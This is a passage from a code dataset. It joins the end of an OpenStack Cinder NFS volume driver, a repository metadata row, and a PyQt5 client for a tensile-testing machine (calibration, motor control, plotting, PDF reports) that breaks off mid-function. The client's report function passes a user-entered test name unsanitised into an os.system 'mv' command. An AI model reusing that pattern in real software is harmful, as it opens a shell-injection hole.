vol_ref_share = vol_ref_share_ip + ':' + share_split[1]
return vol_ref_share
def _get_share_mount_and_vol_from_vol_ref(self, vol_ref):
"""Get the NFS share, the NFS mount, and the volume from reference
Determine the NFS share point, the NFS mount point, and the volume
(with possible path) from the given volume reference. Raise exception
if unsuccessful.
:param vol_ref: Driver-specific information used to identify a volume
:return: NFS Share, NFS mount, volume path or raise error
"""
# Check that the reference is valid.
if 'source-name' not in vol_ref:
reason = _('Reference must contain source-name element.')
raise exception.ManageExistingInvalidReference(
existing_ref=vol_ref, reason=reason)
vol_ref_name = vol_ref['source-name']
self._ensure_shares_mounted()
# If a share was declared as '1.2.3.4:/a/b/c' in the nfs_shares_config
# file, but the admin tries to manage the file located at
# 'my.hostname.com:/a/b/c/d.vol', this might cause a lookup miss below
# when searching self._mounted_shares to see if we have an existing
# mount that would work to access the volume-to-be-managed (a string
# comparison is done instead of IP comparison).
vol_ref_share = self._convert_vol_ref_share_name_to_share_ip(
vol_ref_name)
for nfs_share in self._mounted_shares:
cfg_share = self._convert_vol_ref_share_name_to_share_ip(nfs_share)
(orig_share, work_share, file_path) = \
vol_ref_share.partition(cfg_share)
if work_share == cfg_share:
file_path = file_path[1:] # strip off leading path divider
LOG.debug("Found possible share %s; checking mount.",
work_share)
nfs_mount = self._get_mount_point_for_share(nfs_share)
vol_full_path = os.path.join(nfs_mount, file_path)
if os.path.isfile(vol_full_path):
LOG.debug("Found share %(share)s and vol %(path)s on "
"mount %(mnt)s",
{'share': nfs_share, 'path': file_path,
'mnt': nfs_mount})
return nfs_share, nfs_mount, file_path
else:
LOG.debug("vol_ref %(ref)s not on share %(share)s.",
{'ref': vol_ref_share, 'share': nfs_share})
raise exception.ManageExistingInvalidReference(
existing_ref=vol_ref,
reason=_('Volume not found on configured storage backend.'))
def manage_existing(self, volume, existing_vol_ref):
"""Manages an existing volume.
The specified Cinder volume is to be taken into Cinder management.
The driver will verify its existence and then rename it to the
new Cinder volume name. It is expected that the existing volume
reference is an NFS share point and some [/path]/volume;
e.g., 10.10.32.1:/openstack/vol_to_manage
or 10.10.32.1:/openstack/some_directory/vol_to_manage
:param volume: Cinder volume to manage
:param existing_vol_ref: Driver-specific information used to identify a
volume
"""
# Attempt to find NFS share, NFS mount, and volume path from vol_ref.
(nfs_share, nfs_mount, vol_path) = \
self._get_share_mount_and_vol_from_vol_ref(existing_vol_ref)
LOG.debug("Asked to manage NFS volume %(vol)s, with vol ref %(ref)s",
{'vol': volume['id'],
'ref': existing_vol_ref['source-name']})
self._check_volume_type(volume, nfs_share, vol_path)
if vol_path == volume['name']:
LOG.debug("New Cinder volume %s name matches reference name: "
"no need to rename.", volume['name'])
else:
src_vol = os.path.join(nfs_mount, vol_path)
dst_vol = os.path.join(nfs_mount, volume['name'])
try:
shutil.move(src_vol, dst_vol)
LOG.debug("Setting newly managed Cinder volume name to %s",
volume['name'])
self._set_rw_permissions_for_all(dst_vol)
except (OSError, IOError) as err:
exception_msg = (_("Failed to manage existing volume %(name)s,"
" because rename operation failed:"
" Error msg: %(msg)s."),
{'name': existing_vol_ref['source-name'],
'msg': err})
raise exception.VolumeBackendAPIException(data=exception_msg)
return {'provider_location': nfs_share}
def manage_existing_get_size(self, volume, existing_vol_ref):
"""Returns the size of volume to be managed by manage_existing.
When calculating the size, round up to the next GB.
:param volume: Cinder volume to manage
:param existing_vol_ref: Existing volume to take under management
"""
# Attempt to find NFS share, NFS mount, and volume path from vol_ref.
(nfs_share, nfs_mount, vol_path) = \
self._get_share_mount_and_vol_from_vol_ref(existing_vol_ref)
try:
LOG.debug("Asked to get size of NFS vol_ref %s.",
existing_vol_ref['source-name'])
file_path = os.path.join(nfs_mount, vol_path)
file_size = float(utils.get_file_size(file_path)) / units.Gi
vol_size = int(math.ceil(file_size))
except (OSError, ValueError):
exception_message = (_("Failed to manage existing volume "
"%(name)s, because of error in getting "
"volume size."),
{'name': existing_vol_ref['source-name']})
raise exception.VolumeBackendAPIException(data=exception_message)
LOG.debug("Reporting size of NFS volume ref %(ref)s as %(size)d GB.",
{'ref': existing_vol_ref['source-name'], 'size': vol_size})
return vol_size
def unmanage(self, volume):
"""Removes the specified volume from Cinder management.
Does not delete the underlying backend storage object. A log entry
will be made to notify the Admin that the volume is no longer being
managed.
:param volume: Cinder volume to unmanage
"""
CONF = cfg.CONF
vol_str = CONF.volume_name_template % volume['id']
vol_path = os.path.join(volume['provider_location'], vol_str)
LOG.info(_LI("Cinder NFS volume with current path \"%(cr)s\" is "
"no longer being managed."), {'cr': vol_path})
| [
"[email protected]"
] | |
2bf3f597e8025c8b8805d3462d370391acaf8535 | fd97689f062e6d90837ea27b9a5e3de87bcd1e92 | /Cliente/MET.py | 1037d266937331ca50ced2198eb1c3abeead74d4 | [] | no_license | Edresson/MET | 9f7b8a43bdea29ee844d0c98a20f0aef4afbcdd2 | 5945116d0d52fdf8f892a5f266bf6b51afb529eb | refs/heads/master | 2023-08-31T10:18:35.942324 | 2019-10-29T12:17:15 | 2019-10-29T12:17:15 | 93,848,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75,202 | py | # -*- coding: utf-8 -*-
import pygame
import sys
import os
#from qtpy import QtCore, QtGui
from PyQt5 import QtCore, QtGui, QtWidgets,QtTest
import time
from matplotlib.figure import Figure
#from qtpy import QtTest
from threading import Thread
#from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import (
FigureCanvasQTAgg as FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
import threading
import matplotlib.pyplot as plt
import math
import pickle
##### imports celula e motor####
#from Modulos import celula
from Modulos import clientMotor
Motor = clientMotor
from Modulos import clientCelula
celula = clientCelula
from Modulos import webcam
#from Modulos import celula
#
#from Modulos import celula
### PDF Imports ###
from reportlab.pdfgen.canvas import Canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.units import cm, mm, inch, pica
import os.path
from datetime import datetime
from reportlab.lib.utils import ImageReader
from io import BytesIO
from PIL import Image
from reportlab.pdfbase.pdfmetrics import stringWidth
webc = webcam.Webcam()
celping = celula.ping()
motping= Motor.ping()
log_file=open('MET_Logs.log', 'w')
if celping[0] == 0:
print("Aparentemente o Raspberry Pi não está connectado no Roteador, ou aconteceu algo de errado com o mesmo,Verifique se o mesmo está com o IP:",celping[1]," Se ele está connectado no mesmo roteador que o Notebook , ou ainda se a Porta UDP :",celping[2]," não está em uso por outro serviço nesta rede \n \n",file=log_file)
#nao está pingando
else:
print(" Ping Ok ! Raspberry Pi está configurado corretamente \n",file=log_file)
if motping[0] == 0:
print("Aparentemente o Raspberry Pi não está connectado no Roteador, ou aconteceu algo de errado com o mesmo,Verifique se o mesmo está com o IP:",motping[1]," Se ele está connectado no mesmo roteador que o Notebook , ou ainda se a Porta UDP :",motping[2]," não está em uso por outro serviço nesta rede\n \n",file=log_file)
#nao está pingando
else:
print(" Ping Ok ! Raspberry Pi está configurado corretamente \n"," Caso não seja altere no arquivo IP-Raspberry.txt ",file=log_file)
if motping[0] == 1 and celping[0] == 0 :
print(" Aparentemente o Problema está com a port UDP: ",celping[2]," Você pode ter aberto 2 instancias do software ao mesmo tempo , reinicie o Notebook, se persistir reiniciei também o RaspBerry Pi",file=log_file)
sys.exit()
elif motping[0] == 0 and celping[0] == 1 :
print(" Aparentemente o Problema está com a port UDP:",motping[2]," Caso não seja altere no arquivo IP-Raspberry.txt ",file=log_file)
sys.exit()
elif motping[0] == 0 and celping[0] == 0:
print(" Aparentemente o Problema está no Raspberry Pi, Verifique se o ip dele é mesmo:",motping[1],file=log_file)
sys.exit()
Motor.start_thread()
testes = []
contando = 0
fig = plt.figure(figsize=(9,9))
tipodeensaio = 0
FormatoCorpoProva = 0
AreaCorpoProva = 0
deslocamentos = []
forcas = []
flag = 0
flag2 =0
tempinicioteste = 0
qforca = None
maxforca = None
maxdeslocamento = None
VelocidadeEn = 0
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtWidgets.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtWidgets.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtWidgets.QApplication.translate(context, text, disambig)
class Ui_MainWindow():
def __init__(self):
self.result= QtWidgets.QMessageBox()
self.result.setText("Você deseja fazer mais um teste nesse lote?")
self.result.addButton(QtWidgets.QMessageBox.Yes)
self.result.addButton(QtWidgets.QMessageBox.No)
self.webcam_fim= QtWidgets.QMessageBox()
self.webcam_fim.setText("Você deseja tirar uma foto do objeto?")
self.webcam_fim.addButton(QtWidgets.QMessageBox.Yes)
self.webcam_fim.addButton(QtWidgets.QMessageBox.No)
self.ensaiologin = False
self.filedir = 0
self.u = []
self.thread3 = ServerThread()
self.Index=0
self.Index22 =0
self.text= str()
self.A = []
self.Linhas=[]
self.Grafic = QtWidgets.QWidget()
self.Grafic.setObjectName(_fromUtf8("Grafic"))
self.verticalLayoutWidget = QtWidgets.QWidget(self.Grafic)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(50, 80, 871, 411))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.frame = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.frame.setObjectName(_fromUtf8("verticalLayout_2"))
self.t=1
self.fig = Figure(figsize=(5,5), dpi=100)
self.ax1f1 = self.fig.add_subplot(111,xlabel='Deslocamento(mm)', ylabel='Força(N)', title='')
self.canvas = FigureCanvas(self.fig)
self.line1, =self.ax1f1.plot([],[])
self.fig.canvas.draw()
self.ax1f1.grid(True)
self.canvas = FigureCanvas(self.fig)
self.frame.addWidget(self.canvas)
self.canvas.draw()
self.toolbar = NavigationToolbar(self.canvas,
self.Grafic, coordinates=True)
self.frame.addWidget(self.toolbar)
def selecionar(self):
text = self.combo.currentText()
self.text = text.replace(" Celula de Carga Fator:",";")
self.t = ''
for i in self.text:
if(i != ';'):
self.t = self.t + i
else:
self.t =''
#print(self.text,self.t)
self.CALIBRA = open("Fator_Calibracao.txt","w")
self.CALIBRA.write(self.t)
self.CALIBRA.close()
celula.iniciarcel(self.t)
self.updateCelulaInterface()
self.obs3.setGeometry(QtCore.QRect(20,190,741,41))
self.obs3.setText(_translate("MainWindow", "Celula: "+self.text+" Selecionada, Agora a maquina Opera com esta Celula de Carga",None))
self.obs3.show()
def combo2_chosen(self, text=0):
text = self.combo2.currentText()
self.Index=self.combo2.currentIndex()
self.Index22 = str(text)
def combo_chosen(self, text=0):
text = self.combo.currentText()
self.Index=self.combo.currentIndex()
self.text = text.replace(" Celula de Carga Fator:",";")
def Excluir(self):
self.combo.removeItem(self.Index)
for i, valor in enumerate(self.A):
if valor == self.text:
self.A.pop(i)
self.CALIBRA = open("conf_celulas.txt","w")
for i in self.A:
self.CALIBRA.write(str(i))
self.CALIBRA.close()
self.obs3.setGeometry(QtCore.QRect(20,190,741,41))
self.obs3.setText(_translate("MainWindow", "Celula: " +self.text+ " Excluida",None))
self.obs3.show()
def ecalibrar(self):
self.bcal.hide()
self.ecal.hide()
self.obs3.setText(_translate("MainWindow", "Calibrando Celula de Carga Aguarde ! ",None))
VALUE_SERIAL= celula.calibrar()
B = self.pcal.value()
Fator= (float(VALUE_SERIAL)/float(B))
print(Fator,B,VALUE_SERIAL)
self.combo.clear()
self.t = str()
for i, valor in enumerate(self.A):
if valor == self.text:
self.posicao = i
self.p = 0
self.j =0
while(self.p == 0):
if(self.A[i][self.j] != ';'):
self.t= self.t + self.A[i][self.j]
self.j += 1
else:
self.p =1
self.A.pop(i)
self.A.append(self.t+";"+str(Fator)+"\n")
self.CALIBRA = open("conf_celulas.txt","w")
for k in self.A:
self.CALIBRA.write(k)
self.CALIBRA.close()
self.bcal2.hide()
self.obs3.setText(_translate("MainWindow", "Celula de Carga Calibrada agora você já pode Colocar novamente as Garras/Mordentes\n Celula: "+self.t,None))
self.bcal.show()
self.ecal.show()
self.pcal.hide()
def editCalibra(self):
self.bcal2.hide()
self.obs3.hide()
celula.tare()
self.pcal = QtWidgets.QDoubleSpinBox(self.Calibra)
self.obs3 = QtWidgets.QLabel(self.Calibra)
self.bcal2 = QtWidgets.QPushButton(self.Calibra)
self.bcal.hide()
self.ecal.hide()
self.pcal.setGeometry(QtCore.QRect(210,240,81,29))
self.pcal.setObjectName(_fromUtf8("pcal"))
self.pcal.setRange(0,10000.00)
self.pcal.setValue(1.00)
self.pcal.show()
self.obs3.setGeometry(QtCore.QRect(20,190,741,71))
self.obs3.setObjectName(_fromUtf8("obs"))
self.obs3.setText(_translate("MainWindow", "Informe o Valor do Peso Padrão (EM KG), após coloque o mesmo na celula de Carga e Clique em continuar.",None))
self.obs3.show()
self.bcal2.setGeometry(QtCore.QRect(190,340,151,21))
self.bcal2.setObjectName(_fromUtf8("bcal"))
self.bcal2.setText(_translate("MainWindow", "Continuar",None))
self.bcal2.show()
self.bcal2.clicked.connect(self.ecalibrar)
def editcalib(self):
self.combo.hide()
self.bcal2 = QtWidgets.QPushButton(self.Calibra)
self.bcal2.setGeometry(QtCore.QRect(190,340,151,21))
self.bcal2.setObjectName(_fromUtf8("bcal"))
self.bcal2.setText(_translate("MainWindow", "Continuar",None))
self.bcal2.clicked.connect(self.editCalibra)
self.bcal2.show()
self.bcal.hide()
self.ecal.hide()
self.ccal.hide()
self.dcal.hide()
self.scal.hide()
self.obs3.setGeometry(QtCore.QRect(20,190,741,41))
self.obs3.setObjectName(_fromUtf8("obs"))
self.obs3.setText(_translate("MainWindow", "OBS: Retire as Garras/Mordentes da Celula de Carga, Não deixe nada apenas a Celula de Carga, após Clique em Continuar.",None))
self.obs3.show()
def add_nova(self):
self.combo.hide()
self.obs3.hide()
self.bcal2 = QtWidgets.QPushButton(self.Calibra)
self.bcal2.setGeometry(QtCore.QRect(190,340,151,21))
self.bcal2.setObjectName(_fromUtf8("bcal"))
self.bcal2.setText(_translate("MainWindow", "Continuar",None))
self.bcal2.clicked.connect(self.calibrar)
self.bcal2.show()
self.bcal.hide()
self.ecal.hide()
self.scal.hide()
self.obs3.setGeometry(QtCore.QRect(20,190,741,41))
self.obs3.setObjectName(_fromUtf8("obs"))
self.obs3.setText(_translate("MainWindow", "OBS: Retire as Garras/Mordentes da Celula de Carga, Não deixe nada apenas a Celula de Carga, após Clique em Continuar.",None))
self.obs3.show()
def Editar(self):
self.scal.show()
self.obs3.hide()
self.ecal.hide()
self.bcal.hide()
self.ccal = QtWidgets.QPushButton(self.Calibra)
self.ccal.setGeometry(QtCore.QRect(150,110,131,29))
self.ccal.setObjectName(_fromUtf8("bcal"))
self.dcal = QtWidgets.QPushButton(self.Calibra)
self.dcal.setGeometry(QtCore.QRect(530,110,151,29))
self.dcal.setObjectName(_fromUtf8("bcal"))
self.combo.setGeometry(QtCore.QRect(290,20,192,40))
self.combo.setObjectName(_fromUtf8("pcal"))
self.combo.show()
self.dcal.setText(_translate("MainWindow", "Excluir",None))
self.ccal.setText(_translate("MainWindow", "Calibrar",None))
self.dcal.clicked.connect(self.Excluir)
self.ccal.clicked.connect(self.editcalib)
self.ccal.show()
self.dcal.show()
self.CALIBRA = open("conf_celulas.txt","r")
self.A = self.CALIBRA.readlines()
self.CALIBRA.close()
self.CALIBRA = open("conf_celulas.txt","a")
self.b=[]
for i in range(len(self.A)):
self.b.append(self.A[i].replace(";"," Celula de Carga Fator:"))
self.combo.addItems(self.b)
#self.combo.connect(self.combo, QtCore.SIGNAL('activated(QString)'), self.combo_chosen)
self.combo.activated.connect(self.combo_chosen)
self.CALIBRA.close()
def resetgrafic(self):
deslocamentos= [0]
forcas= [0]
self.PlotGrafico()
def PlotGrafico(self):
self.line1.set_data(deslocamentos, forcas)
self.fig.canvas.draw()
def zeraf(self):
self.Forca_grafic.setValue(0.00)
def zerades(self):
self.Deslocamento_grafic.setValue(0.00)
def Subir(self):
self.pushButton_3.setDisabled(True)
self.pushButton_2.setVisible(True)
self.pushButton_3.setVisible(True)
self.parar_ajuste.setVisible(True)
Motor.Subir_descer(self.Vel_ajuste.value(),1,self.deslb.value())
self.pushButton_3.setDisabled(False)
def Descer(self):
self.pushButton_2.setVisible(True)
self.pushButton_3.setVisible(True)
self.parar_ajuste.setVisible(True)
Motor.Subir_descer(self.Vel_ajuste.value(),2,self.deslb.value())
def Parando(self):
global flag
flag =0
global flag2
global deslocamentos
global forcas
global testes
self.u = []
flag2 =0
self.pushButton_2.setVisible(True)
self.pushButton_3.setVisible(True)
self.parar_ajuste.setVisible(True)
self.pushButton.setVisible(True)
self.pushButton_4.setVisible(False)
self.emergrafic.setVisible(False)
Motor.Parar()
self.confirmar_continuacao()
def confirmar_continuacao(self):
result_webcam_fim = self.webcam_fim.exec_()
if result_webcam_fim == QtWidgets.QMessageBox.No:
pass
if result_webcam_fim== QtWidgets.QMessageBox.Yes:
self.webcamcapture_final()
result1 = self.result.exec_()
if result1 == QtWidgets.QMessageBox.Yes:
self.Config.setCurrentWidget(self.Config)
lotes(self.input.text(),deslocamentos,forcas)
self.Config.setCurrentWidget(self.Config_2)
if result1 == QtWidgets.QMessageBox.No:
self.inputl.show()
self.input.show()
self.botaobrowser.show()
lotes(self.input.text(),deslocamentos,forcas,)
self.ax1f1.cla()
self.ax1f1.grid(True)
self.pushButton.hide()
if(len(testes) > 0):
pass
self.Linhas = []
self.combo2.setGeometry(QtCore.QRect(90,20,192,30))
self.combo2.setObjectName(_fromUtf8("p2cal"))
self.combo2.show()
self.bcombo.setGeometry(QtCore.QRect(90,50,61, 31))
self.bcombo.setText(_translate("MainWindow", "Excluir", None))
self.bcombo.clicked.connect(self.excluirlinha_grafic)
self.bcombo.setObjectName(_fromUtf8("p2cal"))
self.bcombo.show()
for i in range(0,len(testes)):
self.u.append(testes[i]["nome"])
self.aux, = self.ax1f1.plot(list(testes[i]["x1"]),list(testes[i]["x2"]),label='${i}$'.format(i=str(testes[i]["nome"])))
self.Linhas.append(self.aux)
self.ax1f1.legend(loc ='best')
self.fig.canvas.draw()
self.combo2.addItems(self.u)
#self.combo2.connect(self.combo2, QtCore.SIGNAL('activated(QString)'), self.combo2_chosen)
self.combo2.activated.connect(self.combo2_chosen)
contando = 0
self.pushButton_6.show()
self.pushButton_7.show()
pass
def returnposteste(self,index):
global testes
for i in range(0,len(testes)):
if(str(testes[i]["nome"]) == str(index)):
return i
def cancelartestes(self) :
global testes
global contando
contando = 0
testes = []
self.bcombo.hide()
self.combo2.clear()
self.pushButton_6.hide()
self.pushButton_7.hide()
self.combo2.hide()
self.ax1f1.cla()
self.ax1f1.grid(True)
self.line1, = self.ax1f1.plot([],[])
self.fig.canvas.draw_idle()
self.pushButton.show()
def gerarpdf(self):
global testes
self.bcombo.hide()
self.pushButton_6.hide()
self.pushButton_7.hide()
global VelocidadeEn
global forcas
global deslocamentos
global FormatoCorpoProva
global fig
fig2 = []
Image2 = []
imgdata2 = []
now = datetime.now()
if os.path.isdir("Ensaios/"+str(now.year)): # vemos de este diretorio já existe
pass
else:
os.mkdir("Ensaios/"+str(now.year)) # aqui criamos o diretorio
if os.path.isdir("Ensaios/"+str(now.year)+"/"+str(now.month)): # vemos de este diretorio já existe
pass
else:
os.mkdir("Ensaios/"+str(now.year)+"/"+str(now.month)) # aqui criamos o diretorio
if os.path.isdir("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)): # vemos de este diretorio já existe
pass
else:
os.mkdir("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)) # aqui criamos o diretorio
if os.path.isdir("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)+"/"+str(self.input.text())+"Hora"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)): # vemos de este diretorio já existe
pass
else:
os.mkdir("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)+"/"+str(self.input.text())+"Hora"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)) # aqui criamos o diretorio
listdir1 = os.listdir('TempImagens/')
print(os.listdir('TempImagens/'))
for i in listdir1:
os.system('mv '+'TempImagens/'+i+" Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)+"/"+str(self.input.text())+"Hora"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)+"/"+str(i))
Forcamaxima = forcas[-1]
maxdeslocamento = deslocamentos[-1]
Posicaomaxima = deslocamentos[-1]
pdf2 = Canvas("Ensaios/"+"Ensaio_Atual.pdf", pagesize = letter) #Nome do arquivo e Tipo do papel
pdf = Canvas("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)+"/"+str(self.input.text())+"Hora"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)+"/"+str(self.input.text())+"Hora:"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)+".pdf", pagesize = letter) #Nome do arquivo e Tipo do papel
pdf.setFont('Helvetica-Bold', 12)
pdf2.setFont('Helvetica-Bold', 12)
tupla = (' Máquina de Ensaio de Tração e Compressão', '','','','','','','','', ' Ensaio','', 'N° da Solicitação: _________', 'Solicitante/Setor: __________________________________','Inspetor: ___________________________________','Responsável: ___________________________________','' ,
'Data: ' + str(now.day)+'/'+str(now.month)+'/'+str(now.year), 'Hora: ' + str(now.hour)+":"+str(now.minute)+ ":"+ str(now.second) ,'', '', '','' ,'')
lista = pdf.beginText(inch * 1, inch * 10)
lista2 = pdf2.beginText(inch * 1, inch * 10)
for i in range(0,len(tupla)):
lista.textLine(tupla[i])
lista2.textLine(tupla[i])
fig.clf()
ax = fig.add_subplot(111,xlabel='Deslocamento(mm)', ylabel='Força(N)', title='')
ax.grid(True)
for i in range(0,len(testes)):
ax.plot(list(testes[i]["x1"]),list(testes[i]["x2"]),label='${i}$'.format(i=str(testes[i]["nome"])))
ax.legend(loc ='best')
with open("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)+"/"+str(self.input.text())+"Hora"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)+"/"+"save.txt","wb") as fp:
pickle.dump(testes,fp)
"""CALIBRA.write(str(testes)+"\n")
CALIBRA.close()"""
imgdata = BytesIO()
fig.savefig(imgdata, format='png')
imgdata.seek(0) # rewind the data
Image = ImageReader(imgdata)
pdf2.drawText(lista2)
pdf.drawText(lista)
pdf2.drawImage(Image ,130,50, width=400,height=350)
pdf.drawImage(Image ,130,50, width=400,height=350)
pdf2.showPage()
pdf.showPage()
for j in range(0,len(testes)):
fig.clf()
ax2= fig.add_subplot(111,xlabel='Deslocamento(mm)', ylabel='Força(N)', title='')
#ax2.cla()
ax2.grid(True)
ax2.plot(list(testes[j]["x1"]),list(testes[j]["x2"]))
X = list(testes[j]["x1"]).copy()
Y = list(testes[j]["x2"]).copy()
X.sort()
Y.sort()
xmax = X[-1]
ymax = Y[-1]
if testes[j]["area"] == 0.0:
testes[j]["area"] = '_______'
tupla = ( '','','','',' Nome Ensaio: '+str(testes[j]["nome"]),'','Tipo de ensaio: '+str(testes[j]["tipo"]) ,
'Formato do corpo de prova: '+str(testes[j]["formato"] ),
'Posição Máxima: '+str( xmax )+" mm",'Força Máxima: '+str(ymax)+'N', 'Área do corpo de prova: '+str(testes[j]["area"])+' mm²', 'Velocidadede ensaio: '+str(testes[j]["vel"])+' mm/min','Comprimento do corpo de prova: __________ mm' ,)
lista3 = pdf.beginText(inch * 1, inch * 10)
lista4 = pdf2.beginText(inch * 1, inch * 10)
for i in range(0,len(tupla)):
lista3.textLine(tupla[i])
lista4.textLine(tupla[i])
pdf.drawText(lista3)
imgdata2 = BytesIO()
fig.savefig(imgdata2 , format='png')
imgdata2.seek(0) # rewind the data
Image2 = ImageReader(imgdata2)
pdf2.drawText(lista3)
pdf.drawText(lista4)
pdf2.drawImage(Image2 ,130,50, width=400,height=350)
pdf.drawImage(Image2 ,130,50, width=400,height=350)
pdf2.showPage()
pdf.showPage()
pdf2.save()
self.cancelartestes()
pdf.save()
x = [0]
y = [0]
def excluirlinha_grafic(self):
global testes
self.line1.set_data([],[])
self.combo2.removeItem(self.Index)
try:
self.idx = int(self.returnposteste(self.Index22))
except:
pass
try:
self.Linhas[self.idx].set_data([], [])
except:
pass
testes.pop(self.idx)
self.ax1f1.cla()
self.Linhas = []
for i in range(0,len(testes)):
self.u.append(testes[i]["nome"])
self.aux, = self.ax1f1.plot(list(testes[i]["x1"]),list(testes[i]["x2"]),label='${i}$'.format(i=str(testes[i]["nome"])))
self.Linhas.append(self.aux)
self.ax1f1.legend(loc ='best')
self.ax1f1.grid(True)
self.fig.canvas.draw_idle()
def Parando3(self,i = None):
global flag2
global flag
flag = 0
flag2 =0
self.pushButton_2.setVisible(True)
self.pushButton_3.setVisible(True)
self.parar_ajuste.setVisible(False)
self.pushButton.setVisible(True)
self.pushButton_4.setVisible(False)
self.emergrafic.setVisible(False)
"""deslocamentos = [0]
forcas = [0]
self.Deslocamento_grafic.setValue(float(0.00))
self.Forca_grafic.setValue(float(0.00))
self.ax1f1.set_ylim(0, forcas[-1]+10)
self.ax1f1.set_xlim(0, deslocamentos[-1]+10)
self.line1.set_data(deslocamentos,forcas)
self.fig.canvas.draw()"""
Motor.Parar()
self.confirmar_continuacao()
def Parando2(self):
global flag2
flag2 =0
self.pushButton_2.setVisible(True)
self.pushButton_3.setVisible(True)
self.parar_ajuste.setVisible(True)
Motor.Parar()
def verificar_Browser_Ensaio(self):
try:
with open(str(self.filedir[0]),"rb") as fp:
testes = pickle.load(fp)
return 1
except:
self.ensaiologin = False
self.res= QtWidgets.QMessageBox()
self.res.setText("Aparentemente você selecionou o arquivo de Browser Ensaio incorretamente, você deve selecionar o arquivo save.txt, você deseja tentar novamente e tentar continuar um antigo teste?")
self.res.addButton(QtWidgets.QMessageBox.Yes)
self.res.addButton(QtWidgets.QMessageBox.No)
result1 = self.res.exec_()
if result1 == QtWidgets.QMessageBox.Yes:
self.func_browser()
return self.verificar_Browser_Ensaio()
if result1 == QtWidgets.QMessageBox.No:
return 0
def iniciar(self):
global deslocamentos
global forcas
global testes
global contando
self.inputl.hide()
self.input.hide()
self.botaobrowser.hide()
if(self.ensaiologin == True and self.ensaiologin != None ):
resul= self.verificar_Browser_Ensaio()
if resul == 1:
with open(str(self.filedir[0]),"rb") as fp:
testes = pickle.load(fp)
contando = len(testes)
self.ensaiologin = False
else:
self.ensaiologin = False
try:
arquivo = open("Fator_Calibracao.txt","r")
fator = arquivo.readline()
celula.iniciarcel(str(fator))
except:
print("O Arquivo Fator_Calibracao.txt, está corrompido ou foi excluido você não pode iniciar o ensaio sem este arquivo, solução: vá até a interface ,selecione a aba celula de carga e escolha novamente a celula de carga isso irá criar o arquivo novamente. \n",file=log_file)
sys.exit()
self.Config.setCurrentWidget(self.Grafic)
deslocamentos = [0]
forcas = [0]
self.Linhas = []
self.pushButton_2.setVisible(False)
self.pushButton_3.setVisible(False)
self.parar_ajuste.setVisible(False)
self.pushButton.setVisible(False)
self.pushButton_4.setVisible(True)
self.emergrafic.setVisible(True)
global flag2
global qforca
global maxforca
global maxdeslocamento
global tempinicioteste
global VelocidadeEn
global tipodeensaio
if(self.checkBox.isChecked() == True):
#Motor.subir()
Motor.Subir_descer(self.Velocidade.value(),1,0)
tipodeensaio = "Tração"
else:
Motor.Subir_descer(self.Velocidade.value(),0,0)
tipodeensaio = "Compressão"
#Motor.baixar()
VelocidadeEn = self.Velocidade.value()
#Motor.calcular( float(VelocidadeEn) )
tempinicioteste = time.time()
if(self.checkBox_3.checkState() == 2):
qforca = self.Velocidade_2.value()
else:
qforca = None
if(self.checkBox_4.checkState() == 2):
max_forca= self.Velocidade_3.value()
else:
max_forca = None
if (self.checkBox_5.checkState() == 2):
maxdeslocamento= self.Velocidade_4.value()
else:
maxdeslocamento= None
if(self.checkBox_6.isChecked() == True):
a = self.a_retangulo.value()
b = self.b_retangulo.value()
else:
a =None
b = None
if(self.checkBox_7.isChecked() == True):
c = self.Velocidade_8.value()
d = self.d_retangulo.value()
else:
c =None
d = None
if(self.checkBox_8.isChecked() == True):
e = self.D_cilimdro.value()
f = self.H_cilindro.value()
else:
e =None
f = None
Area(a,b,c,d,e,f)
flag2 =1
self.thread3.start()
self.thread3.UPsig.connect(self.update1)
self.thread3.Stopsig.connect(self.Parando3)
#QtWidgets.QWidget.connect(self.thread3, QtCore.SIGNAL("UP"), self.update1)
#QtWidgets.QWidget.connect(self.thread3, QtCore.SIGNAL("Parando"), self.Parando3)
def update1(self,lista):
self.Deslocamento_grafic.setValue(lista[0])
self.Forca_grafic.setValue(float(lista[1])*9.8)
self.ax1f1.set_ylim(0, lista[2])
self.ax1f1.set_xlim(0, lista[3])
self.line1.set_data(lista[4],lista[5])
self.fig.canvas.draw_idle()
def calibrar(self):
celula.tare()
self.bcal2.hide()
self.obs3.hide()
self.pcal = QtWidgets.QDoubleSpinBox(self.Calibra)
self.obs3 = QtWidgets.QLabel(self.Calibra)
self.obs4 = QtWidgets.QLabel(self.Calibra)
self.qline = QtWidgets.QLineEdit(self.Calibra)
self.bcal2 = QtWidgets.QPushButton(self.Calibra)
self.bcal.hide()
self.ecal.hide()
self.pcal.setGeometry(QtCore.QRect(210,240,81,29))
self.pcal.setObjectName(_fromUtf8("pcal"))
self.pcal.setRange(0,3000.00)
self.pcal.setValue(1.00)
self.pcal.show()
self.obs3.setGeometry(QtCore.QRect(20,190,741,41))
self.obs3.setObjectName(_fromUtf8("obs"))
self.obs3.setText(_translate("MainWindow", "Informe o Valor do Peso Padrão (EM KG), após coloque o mesmo na celula de Carga , de um nome para a nova celula e Clique em continuar.",None))
self.obs3.show()
self.qline.setGeometry(QtCore.QRect(180,300,151,21))
